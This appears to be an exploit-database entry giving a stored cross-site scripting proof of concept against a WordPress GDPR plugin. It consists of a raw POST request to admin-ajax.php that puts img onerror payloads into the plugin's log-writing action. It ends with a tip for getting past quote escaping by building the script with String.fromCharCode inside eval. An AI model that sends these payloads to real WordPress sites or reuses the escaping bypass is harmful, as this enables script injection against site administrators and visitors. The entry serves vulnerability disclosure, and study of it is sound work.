Share
## https://sploitus.com/exploit?id=WPEX-ID:43B8CFB4-F875-432B-8E3B-52653FDEE87C
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 180

action=dsgvoaio_write_log&id=%3cimg%20src%20onerror%3dalert(%2fXSS-Id%2f)%3e&state=true&key=wordpressmain&name=All&allvalue%5B%5D=%3cimg%20src%20onerror%3dalert(%2fXSS-value%2f)%3e


Payload will be processed by update_option(). This will lead into escaped single and double qoutes. You can use
the String.fromCharCode string construction to bypass this limitation, such as %3Cimg%20src%3D1%20style%3Ddisplay%3Anone%20onerror%3Deval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C49%2C50%2C41))%3E